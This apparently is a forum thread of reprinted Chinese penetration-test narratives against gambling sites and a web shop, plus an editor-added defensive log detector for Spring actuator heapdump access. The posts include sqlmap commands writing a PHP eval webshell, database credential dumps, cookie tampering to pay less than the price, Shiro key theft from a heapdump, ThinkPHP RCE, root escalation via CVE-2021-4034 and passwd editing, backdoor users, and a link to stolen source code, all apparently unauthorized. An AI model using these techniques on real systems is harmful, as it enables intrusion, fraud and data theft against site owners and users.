        select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/'
        select @@CHARACTER_SET_CLIENT: 'utf8'
        select @@DATADIR: '/var/lib/mysql/'
        select @@CHARACTER_SET_SERVER: 'latin1'

    5. After a round of information gathering: the current user's privileges are very low and there is very little useful information.
    6. Scanned the target's ports and found quite a lot of them open.
    7. Port 80 is open with no page. Port 888 is the default Apache homepage, which gives the absolute path /var/www/html/. Port 9090 is the gambling site's admin login; port 9091 is the member login.
    8. After testing, there are no usable vulnerabilities on those two pages.

    0x01 Breakthrough point
    1. Directory scanning turned up an error page, which gave an injection point and an info.php.
    2. Got root privileges on the database:

        db_test
        Current database
        [19:54:48] [INFO] resumed: 'root'@'localhost'
        [19:54:48] [INFO] resumed: 'developer'@'localhost'
        [19:54:48] [INFO] resumed: 'root'@'127.0.0.1'
        [19:54:48] [INFO] resumed: 'syncopy'@'222.xxx.xxx.xxx'
        [19:54:48] [INFO] resumed: 'mlh'@'localhost'
        [19:54:48] [INFO] resumed: 'developer'@'%'
        [19:54:48] [INFO] resumed: 'mlh'@'%'
        [19:54:48] [INFO] resumed: 'edc'@'%'
        [19:54:48] [INFO] resumed: '6hc_nav'@'%'

    0x02 Trying to write a shell
    1. Writing a shell through SQL statements did not succeed. Non-query SQL statements can only be executed when stacked queries are available:

        sqlmap --sql-shell
        select '<?php eval($_POST['x']);' into outfile '/var/www/html/25u_ft/1.php'

    2. Write it another way:

        --file-write '/localhost/shell.php' --file-dest '/var/www/html/25u_ft/test.php'

    3. It simply cannot be written. I found there is no write permission, only read permission:

        --file-read '/var/www/html/25u_ft/info.php'

    4. Reads work fine, so I tried reading configuration files, and then went down the wrong path:
       (1) I read several configuration files and had no idea.
       (2) Went back, dumped the administrator's password through the injection and tried to get a shell from the admin panel:

           -D '10fenft' -T 'g_user' -C 'g_name,g_password' --dump

       (3) Logged into the admin panel successfully.
       (4) A set of simple admin panels with no upload function.

    0x03 getshell
    1. All the conditions that should be there are there, I just can't get the shell, which is very uncomfortable.
    2. Looked up this IP through various channels and suddenly found that a domain name had resolved to it before.
    3. Great, the domain can be accessed normally; it is a forum.
    4. It turned out to be ThinkPHP, and the absolute path was also leaked.
    5. Repeat the earlier write operation and it succeeds immediately, hahahaha.

    0x04 Packaging the source code
    1. Connect to the shell directly.
    2. The privileges are not high, but that doesn't stop me from packaging the source code at all.

    0x05 Summary
    I found that there are many sites of the same type. The source code is placed below:
    https://xzfile.aliyuncs.com/upload/affix/20210513165936-8aadc29a-b3c9-1.rar

    Reproduced from: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486232&idx=1&sn=301810a7ba60add83cdcb99498de8125&chksm=ce67a181f9102897905ffd677dafeb90087d996cd2e7965300094bd29cba8f68d69f675829be&scene=21#wechat_redirect
    https://xz.aliyun.com/t/9567
  32. Guest
    One day I was hunting EDU bugs until I felt autistic, then thought I'd use FOFA to see if there were any fun sites. Good guy, there is a mall like this; forgive my ignorance. So I wanted to go in and study it.

First we did some preliminary information collection. Basically everything is pseudo-static, and nothing clearly reveals the backend language. After clicking the search box, you can see that this URL doesn't help us determine the type of site either, but we should still try SQL injection. Then my IP got banned straight away, so I simply gave up on this spot and went on looking for other functional points.

When we click on order query, the URL changes and jumps to the login/registration page. Since we're here, register an account and see if there is any other business; you can't just leave it alone, hahaha. If you try XSS in the nickname, you get banned. So put that aside and look for business logic flaws instead.

Try buying some products. I had always heard of payment vulnerabilities before but never actually met one; try my luck. Click buy, and I found a strange parameter appearing in the cookie. Let's urldecode it and see what it is. Then guess: the price should be in front and the purchase quantity at the back. Change it first, encode it back, and replace it in the packet. Because it is in a cookie, the cookie in every subsequent request has to be changed too. You can see that our unit price became 1, the quantity 10 and the total amount 10. Record the correspondence between the parameters.

Submit the order, modify the value in the cookie, continue, and the page jumps to the Alipay payment page. Click Alipay and the price has indeed changed. That's right: a product worth 75 yuan costs only 17 yuan to pay, whether or not the merchant ships it.

Unexpected surprise: then I found a parameter that hadn't been tested before, so let's try it. user_zheko should mean discount (折扣), so modify it and verify. 100 is known to be no discount, so what if I change it to 0? The address selector won't pop up. After changing it to 1, I really did get a discount, hahaha. You can see you only have to pay 14 yuan, and you can keep paying at the 1折 (10 percent) rate. Then there is 7 yuan postage (the merchant doesn't offer free shipping), so you can pay 21 yuan and take the product home. Exciting to think about!

Summary:
1. Bug hunting in one sentence: dig carefully and the world is yours!
2. When facing logic flaws, pay attention to the parameters every time a page redirects or interacts, and guess as much as possible what each passed parameter does. If Burp is inconvenient for viewing, other tools work too; use whatever you prefer. Test carefully and don't miss small points; you may be surprised.
3. I didn't find any order-query IDOR; I didn't expect the payment point to actually be controllable from the front end. Hehehe.

Reprinted from: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486060&idx=1&sn=a4b977e9e3bbfe7b2c9ec479942e615c&chksm=ce67a0f5f91029e30c854eb2f71173efe925a38294fd39017708abcf4deea5c2b25dee518ebf&scene=21#wechat_redirect
  33. 游客
    游客发布主题帖子在 A Test Forum
    First encounter with difficulties When I find a bQc station, try to hit the main site first. First try scanning the directory to see if I can find some backgrounds and so on. I am using dirsearch here. But unfortunately, there is no valuable directory and I can't even scan the background, but this is expected. After all, most spinach website protection is done well. Next, try to register an account and take a look. Try injecting, and find that the encryption is not reversed, I can only give up temporarily.After registration, it was found that an upload interface was found.According to the upload, it was found that it was stored in the form of id, and the upload vulnerability could not be caused. This website cannot be obtained and changes its thinking. Try to penetrate the entire IP. First, scan the entire port of this IP and try to obtain more complete information. Two web pages were obtained. rocketmq, this latest version of vulnerability has been exposed and tried. found the tool to try to attack, but failed to execute the command. There is another login interface The shiro framework was found Attempted to blast but no secret key was found. The willows and flowers are bright Breakthrough point: He has a port 8888, and he will jump to the illegal IP when accessing it. After looking at burp, he found that he would visit the login page and then jump to it. Frowning and found that things were not simple. He added a little bit after the IP, which caused him to report an error. He found that he was using the spring framework.Actuator is a functional module provided by Spring Boot for introspection and monitoring of application systems. With the help of Actuator developers, they can easily view and count certain monitoring indicators of application systems. Actuator The core is the endpoint Endpoint, which is used to monitor applications and interactions. 
There are already many built-in in spring-boot-actuator Endpoint (health, info, beans, metrics, httptrace, shutdown, etc.), and also allows us to expand our own Endpoints. Each Endpoint can be enabled and disabled. To access Endpoint remotely, it must also be exposed via JMX or HTTP, and most applications choose HTTP. Whether the path is enabled by default Function Description /auditevents is to display the audit event information of the current application /beans is to display the complete list of all Spring beans in an application /conditions is to display the status of configuration classes and auto-configuration classes and the reasons why they are applied or not applied /configprops is to display a collection list of all @ConfigurationProperties /env is to display from Spring The property of ConfigurableEnvironment /flyway is to display the database migration path (if present) /health is to display the application's health information (when accessed using an unauthenticated connection, it displays all information details when accessed using an authenticated connection) /info is to display any application information /liquibase is to display any Liquibase database migration path (if present) /metrics is to display the current application's metrics information /mappings is to display Show a list of all @RequestMapping paths /scheduledtasks is showing scheduled tasks in the application /sessions does not allow user sessions to be retrieved and deleted from Spring session supported session storage /shutdown does not allow the application to be closed elegantly (not enabled by default) /threaddump is executing a thread dump/heapdump is returning a GZip compressed hprof heap dump file /jolokia is exposing JMX via HTTP beans (Which when Jolokia is on the classpath, WebFlux is not available) /logfile returns the content of the log file (if the logging.file or logging.path attribute is set), and supports the use of HTTP Range headers to receive part of the information 
of the log file content. Prometheus displays metrics information in a format that can be scraped by the Prometheus server. Directly use the directory list collected for Spring for directory scanning. Start scanning; heapdump is found to exist, so download it. Heap Dump, also called a heap dump file, is a memory snapshot of a Java process at a certain point in time. A leaked heapdump file can be analyzed with the Eclipse Memory Analyzer tool to query the plaintext password information loaded into memory, such as the Redis password or the MySQL database account and password. Here I am using Master whwlsfb's JDumpSpider: https://github.com/whwlsfb/JDumpSpider. Successfully obtained Shiro's key, then a memory horse (in-memory webshell). Obtained administrator permissions. Reprinted from the original link address: https://mp.weixin.qq.com/s/-ZdaVuqVmsw9PCHYDYuABA
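Added here as an editor's example, not code from the reprinted post: a defender-side check that runs over constructed web-server access-log lines and flags served (HTTP 200) requests to secret-bearing Spring Boot actuator endpoints such as the heapdump the post downloads. The combined log format, the IPs and the endpoint set are assumptions.

```python
import re

# Constructed sample access-log lines in combined log format (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /actuator HTTP/1.1" 200 1870 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "GET /actuator/env HTTP/1.1" 200 9810 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /actuator/heapdump HTTP/1.1" 200 104857600 "-" "python-requests/2.31"
10.0.0.7 - - [10/Mar/2024:12:00:05 +0000] "GET /gateway/actuator/heapdump HTTP/1.1" 404 153 "-" "curl/8.0"
10.0.0.5 - - [10/Mar/2024:12:00:06 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.27"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Endpoints whose successful retrieval leaks secrets or allows control (assumed set; heapdump is the post's case).
SENSITIVE = {"heapdump", "env", "configprops", "jolokia", "shutdown", "loggers",
             "threaddump", "httptrace", "trace", "dump", "logfile", "sessions"}


def classify_path(path):
    """Return the sensitive actuator endpoint named by `path`, "actuator" for the
    index listing, or None. Handles prefixed forms such as /gateway/actuator/..."""
    parts = path.split("?", 1)[0].rstrip("/").lower().split("/")
    if "actuator" not in parts:
        return None
    tail = parts[parts.index("actuator") + 1:]
    if not tail:
        return "actuator"          # the index itself reveals which endpoints are exposed
    endpoint = tail[0].split(".")[0]   # heapdump.json -> heapdump
    return endpoint if endpoint in SENSITIVE else None


def find_actuator_exposure(log_text):
    """Return one alert dict per served (HTTP 200) request to a sensitive actuator endpoint."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        endpoint = classify_path(m["path"])
        if endpoint is None or m["status"] != "200":
            continue               # 404/403 means the endpoint was probed but not exposed
        alerts.append({"ip": m["ip"], "endpoint": endpoint, "path": m["path"],
                       "bytes": int(m["size"]) if m["size"].isdigit() else 0})
    return alerts
```

A multi-megabyte 200 response to /actuator/heapdump is the signature to alert on; the 404 against the gateway path shows a probe that found nothing and is deliberately not reported.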
  34. Guest
    Preface: On a sunny afternoon, we were chatting enthusiastically under the leadership of Blank and women, and Mr. Float discovered a strange IP that had visited his blog. Alas, I don't take the network security laws seriously at all; just start fighting. Game start: Browser access directly jumps to the login interface. Information collection: Knock an X on the path and get ThinkPHP and the version number. At the same time, Mr. Float's nmap scan found port 801 and confirmed it was a Baota (BT panel) site build; however, there is no further study here. RCE attempt: 5.0.21 can be RCE'd directly, and payloads are flying all over the sky, but I still hit a small pitfall: the module name is not the usual index and must exist. Log in according to the jump: /admin/login/index.html. It was guessed that the module was admin, and it was indeed successful. Disable_functions is in the list, and RCE is indeed unsuccessful. Still, a horse (webshell): the good news is that the file was successfully written. Visit shell.php and see the phpinfo interface. Then wrote a Behinder (冰蝎) shell and connected to it. I took the opportunity to take a look: loan, manager, salesperson, bc. OK, keep playing. Connect the database: Hard-coding is really a universal problem, and the database password is obtained. This is the first time I encountered a MySQL password with an @ in it; writing it directly will break the connection string, like: mysql://root:[email protected]:3306/mysql. The @ in the password makes the parser judge the ip:port too early; it needs to be encoded as %40. Administrator login: There is no progress from flipping through the web directory and code, so try to log in to the system. There is an account password in the database; of course, the password is a salted hash. Whoever has a good family must have a password; just patch the login code, and then it won't check the table. Log in to the system.
    This business looks so advanced that I can't quite understand it, so I leave a backdoor user in case of a miss. Reprinted from the original link: https://mp.weixin.qq.com/s/f4nWOGgPXlSA_ChgpBj7Zw
  35. Guest
    A 0-day for a gambling ("spinach") site from a big brother, which is an arbitrary file upload. The webshell is obtained through arbitrary file upload, but by scanning the ports you can see that Baota (pagoda panel) is open. Then the following problem arose. Use Godzilla's bypass plugin to execute commands. The user is www, the default Baota user. The next step is the regular operations: escalate privileges and log in to Baota. First carry out the escalation: upload the escalation tool ("escalation cow") and then look at which escalation exploits can be used. After running it, use CVE-2021-4034 to escalate, first uploading the EXP file to the gambling server. Bounce a shell, then enter the exp folder to compile and run it to obtain root permissions. After obtaining root permissions, do the work: just create an account and grant permissions. The reverse shell cannot vim, so save its passwd file locally and set the third column to 0, so that logging in afterwards is root. The account created is ftpp; save it as the passwd file and upload it to the web directory. Use the root permissions from the privilege escalation to delete passwd first and then copy it over. Because this server has a Baota control panel, first enter /www/server/panel/data. There is a default.db file in this folder, which is the Baota configuration data file. After saving it locally, modify the Baota password in it and log in. Then remember to restore the db data file at the end, so that his password will be the original password. Then change the password and log in. By logging in, you can see the complete information of the site, as well as the database password, the web directory, and his mobile phone number, but the mobile phone number shows only the first three and last four digits; the middle four digits are *. The previous method of checking the mobile phone number is useless. In fact, just call it here, and just hand it over to the police to arrest the person.
    Reprinted from the original link: https://mp.weixin.qq.com/s/iUipOa4BI8mCBJ7o2QgJrA